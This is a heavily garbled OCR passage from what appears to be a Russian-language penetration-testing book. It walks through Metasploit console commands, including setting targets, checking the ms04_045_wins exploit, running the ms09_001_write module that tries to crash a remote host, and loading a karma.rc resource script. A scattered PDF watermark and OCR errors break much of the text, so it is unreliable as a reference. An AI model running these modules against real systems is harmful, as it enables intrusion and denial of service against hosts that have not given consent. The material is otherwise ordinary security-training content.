RHOSTS => 192.169.1.0/24

 

 

 

 

 

 

 

 

m

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

o

 

setg RHOST 192.169.1.136

 

.

df-xchanmsf6 >

 

 

 

 

 

.c

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

 

 

 

 

e

 

 

 

 

 

 

 

 

 

RHOST => 192.169.1.136

 

 

 

 

 

 

 

msf6 >

save

Saved configuration to: /root/.msf6/config msf6 >

save.

9.7.5. Команда check- проверка целевой системы

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

 

 

 

check,

msf6 exploit(ms04 045_wins)

> show options

Module options:

 

 

Name

Current Setting

Required

Description

 

---------------

--------

-----------

RHOST

192.169.1.114

yes

The target address

RPORT

42

yes

The target port

Exploit target:

Id Name

ОWindows 2000 English

msf6 exploit(ms04_045_wins) > check

[-] Check failed: The connection was refused Ьу the remote host (192.169.1.114:42)

9.7.6. Команда back- возврат

Когда ты закончишь работу с определенным модулем, введи команду back для возврата обратно. Дальше ты сможешь выбрать другой модуль и про­ должить работу.

•······················---·---··--··---·---··---·--··----

·-·-·-···-----

·--··---··-·

.........

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

)l,IB,I '). l)l"llll.11,1111\,llllll' 'lll,1,plo1I

9.7.7.Команда run - запуск эксплоита

1 111 В\

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

10\1,1

 

BUY

 

 

 

 

 

 

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

msfб auxiliary(ms09 OOl_write) > run

Attempting to crash the remote host ...

datalenlow=65535 dataoffset=65535 fillersize=72 rescue

datalenlow=55535 dataoffset=65535 fillersize= 72 rescue

datalenlow=45535 dataoffset=65535 fillersize=72 rescue

datalenlow=35535 dataoffset=65535 fillersize=72 rescue

datalenlow=25535 dataoffset=65535 fillersize=72 rescue

9.7.8. Команда resource- определение ресурса

resource.

msfб > resource karma.rc resource> load db sqliteЗ

[-]

[-] The functionality previously provided Ьу this plugin has been

[-] integrated into the core command set. Use the new 'dЬ driver'

[-] command to use а database driver other than sqliteЗ (which [-] is now the default). All of the old commands are the same. [-]

[-] Failed to load plugin from /pentest/exploits/frameworkЗ/ plugins/dЬ sqliteЗ: Deprecated plugin

resource> dЬ create /root/karma.dЬ

[*] The specified database already exists, connecting

*] Successfully connected to the database

. - - - - - -- - - - - - --- - - - - - . - - - - - - -- - - . - . - - - . . - - - .-·. - - . - - - . - - .. - . - - - .. - - .-- - - ... -